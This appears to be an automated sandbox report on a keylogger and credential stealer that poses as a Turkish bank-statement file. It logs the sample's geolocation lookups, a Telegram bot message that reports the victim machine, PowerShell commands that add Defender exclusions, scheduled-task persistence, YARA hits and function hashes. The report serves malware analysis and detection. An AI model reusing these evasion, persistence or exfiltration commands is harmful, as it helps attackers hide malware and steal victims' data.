54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49757	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:59 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:59 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15402 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cX%2BaAsjBmYl%2Bcx3rhawzePJIWoyuLPD9iq2riCmUTW9DbWhWvAvMXmZAFrGGiKQKLw9AcFYsMRYCdOxgxjfpJgTYSnLJvvRVqO4YdYt6OLEM%2BATIfvBeuPxRz3bfYzSRcJ8PqohM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7608bdbe8c12-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1999&rtt_var=755&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1444829&cwnd=177&unsent_bytes=0&cid=4791eeddccab37ff&ts=454&x=0"
2024-12-10 13:07:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49758	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:59 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:08:00 UTC	878	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15402 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60sA6qyWTpi2EPYBTI4Bu%2FeP3HA6%2FgIqprmtpHTW3uwDUIt0X6tgZI7hj4n3biiSaYekQwp6OJ1SflloSLu1RGYa1g8km%2Bo9sfsvfezx44LYF24jhQeka%2BX4ltYkHUAWEU9WktnV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd760bac9142d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8636&min_rtt=1783&rtt_var=4902&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1637689&cwnd=246&unsent_bytes=0&cid=6bfdf7f518e337f2&ts=449&x=0"
2024-12-10 13:08:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49759	149.154.167.220	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:01 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:26:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-10 13:08:01 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 10 Dec 2024 13:08:01 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 13:08:01 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49761	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:02 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:08:03 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:08:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15406 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s41y34JoOxzRkTGIfbZ5HUIE6OlXaNcAXsAipxPr5XCFDiGvv4MZ1pszlI%2FcRspF0t6RStaxWCEElaSd6%2FKaUFjoc4u27X4VGAvnD14ZTOaF09L%2B9lX6yGBJOMyYocLCxrN0ZH6f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd761ef81443ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1596&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1771844&cwnd=221&unsent_bytes=0&cid=9e94df46a1febef8&ts=460&x=0"
2024-12-10 13:08:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49762	149.154.167.220	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:08:04 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/12/2024%20/%2012:38:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-10 13:08:05 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 10 Dec 2024 13:08:04 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-10 13:08:05 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	1
Start time:	08:07:27
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Imagebase:	0x590000
File size:	1'001'472 bytes
MD5 hash:	A1D6C4EE5E1BF8E8E8E335E25E3CB4EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2382340828.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Imagebase:	0xd10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"
Imagebase:	0xd10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp"
Imagebase:	0x80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:07:29
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:07:30
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe"
Imagebase:	0x930000
File size:	1'001'472 bytes
MD5 hash:	A1D6C4EE5E1BF8E8E8E335E25E3CB4EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.4791309433.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4791309433.000000000043D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4794954969.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:07:32
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
Imagebase:	0xf20000
File size:	1'001'472 bytes
MD5 hash:	A1D6C4EE5E1BF8E8E8E335E25E3CB4EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:07:32
Start date:	10/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp335D.tmp"
Imagebase:	0x80000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EfgRyiVrT.exe"
Imagebase:	0x810000
File size:	1'001'472 bytes
MD5 hash:	A1D6C4EE5E1BF8E8E8E335E25E3CB4EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4793857289.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	180
Total number of Limit Nodes:	13

Executed Functions

Function 00D46F92 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345457eb86e71e4f58a38296af8a8403cd41d9aadfbe02e4afb26da09bf5496e
Instruction ID: 942ab60c3be1325fdd24abbbb3d40e622153a398d116bada3a00866cb08d646b
Opcode Fuzzy Hash: 345457eb86e71e4f58a38296af8a8403cd41d9aadfbe02e4afb26da09bf5496e
Instruction Fuzzy Hash: D751A470E012498FDB08DFA9D8959EEFBF2FF88300F14846AD415AB265DB319946CF50

Function 00D44218 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ff132fb1f7526d253f79b83c3eb6f425246d481406c57232bbf8d9cd3b3788f
Instruction ID: 3f58d6832e763915af3fe225686b1cc58ebc562ae2b2a9eb540ad5afc3b7a920
Opcode Fuzzy Hash: 3ff132fb1f7526d253f79b83c3eb6f425246d481406c57232bbf8d9cd3b3788f
Instruction Fuzzy Hash: 9E519574E012099FDB08DFA9D8959EEBBF2FF88300F14842AD415AB365DB719946CF90

Function 06F38AC1 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6e7bd2269701197f6d9085f3cfd8e8169d98fbcabf3162a9f13913c520fd2b
Instruction ID: 4236a25d88433cef39727620a601111b51d2e9bf3a95dab7d4e1b078cdda92fe
Opcode Fuzzy Hash: 9a6e7bd2269701197f6d9085f3cfd8e8169d98fbcabf3162a9f13913c520fd2b
Instruction Fuzzy Hash: AED05E74809164CFD7C0DF54C8995B8BBB8BB0E340F003492E00AA7391DB308884CE40

Function 06F38C4C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf92457b5f872065dc5ce016fd7e31943447e03c43a42cd3a3b44e49fa30a881
Instruction ID: 734c48f39e7c05354aea45b4792b300219df237919815b1abbfd85735209a4d7
Opcode Fuzzy Hash: bf92457b5f872065dc5ce016fd7e31943447e03c43a42cd3a3b44e49fa30a881
Instruction Fuzzy Hash: 94A00286C8F0359DA2D02D1409822B4F03C4B0B490E003901147F770C75989C004408D

Function 00D4D4E8 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D576
GetCurrentThread.KERNEL32 ref: 00D4D5B3
GetCurrentProcess.KERNEL32 ref: 00D4D5F0
GetCurrentThreadId.KERNEL32 ref: 00D4D649

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e81fbcbcdadcd908f700b881334493be329fb36d7f4c0d32543f1e227eaad350
Instruction ID: 3b21d096495e5e3457571e78e0f2ddde1d7c1512f25625664afd1807c2fbfaac
Opcode Fuzzy Hash: e81fbcbcdadcd908f700b881334493be329fb36d7f4c0d32543f1e227eaad350
Instruction Fuzzy Hash: F15187B0900349CFDB14CFA9D548B9EBBF2EF88318F248459E049A73A0DB75A944CF65

Function 00D4D4F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D576
GetCurrentThread.KERNEL32 ref: 00D4D5B3
GetCurrentProcess.KERNEL32 ref: 00D4D5F0
GetCurrentThreadId.KERNEL32 ref: 00D4D649

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: de80d775e9bcb86873b16f5a8e6a5bf824bda24edff599b06e40a42bbf0815d9
Instruction ID: 62b018dd7042f7ca2b4d7eaaf083a6d83fdc4224c6c52ce8ab28dfe09653824f
Opcode Fuzzy Hash: de80d775e9bcb86873b16f5a8e6a5bf824bda24edff599b06e40a42bbf0815d9
Instruction Fuzzy Hash: 965154B0900349CFDB14CFAAD548B9EBBF5AF88318F248459E409A7390DBB5A944CF65

Function 06F3568C Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F358CE

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 005cd0a6a1de646a55573bdf04bd88286e78d40cf367260310a30cf695f83f89
Instruction ID: ed9798b471b6778086aafbfa4ad372696a82a5410b00f16ced68df8e39bd87b8
Opcode Fuzzy Hash: 005cd0a6a1de646a55573bdf04bd88286e78d40cf367260310a30cf695f83f89
Instruction Fuzzy Hash: 09914C71D01269DFEF64DFA8C9417EDBBB2BF88310F148569E808A7240DB749985CF91

Function 00D4AE59 Relevance: 1.7, APIs: 1, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D4B0BE

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d40000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5288864eca905cbc2dfecda02579a9c37e394fa58ba69b09c4dea64a7606bca9
Instruction ID: ebc1115eadcdff31597b6c0e1b1f652145bf3b8343c9431eef492348d9d208a9
Opcode Fuzzy Hash: 5288864eca905cbc2dfecda02579a9c37e394fa58ba69b09c4dea64a7606bca9
Instruction Fuzzy Hash: 5AA189B0A00B458FD725DF29D45079ABBF1FF84304F04492EE096CBA51D775E80ACBA1

Function 06F35698 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F358CE

Memory Dump Source

Source File: 00000001.00000002.2391447487.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6f30000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 99bb536f80217989bf48821b1b41f5eba66b51a885f213b29be451405260fe74
Instruction ID: 5ce302fc02298a6f169432a297f3e8c0eeab2b1a77195c38efeb98ab9427d599
Opcode Fuzzy Hash: 99bb536f80217989bf48821b1b41f5eba66b51a885f213b29be451405260fe74
Instruction Fuzzy Hash: 14914B71D01269DFEF64DFA9C8417EEBBB2BF88310F148569E808A7240DB749985CF91

Function 00D4590D Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00D459C9

Memory Dump Source

Source File: 00000001.00000002.2379159329.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

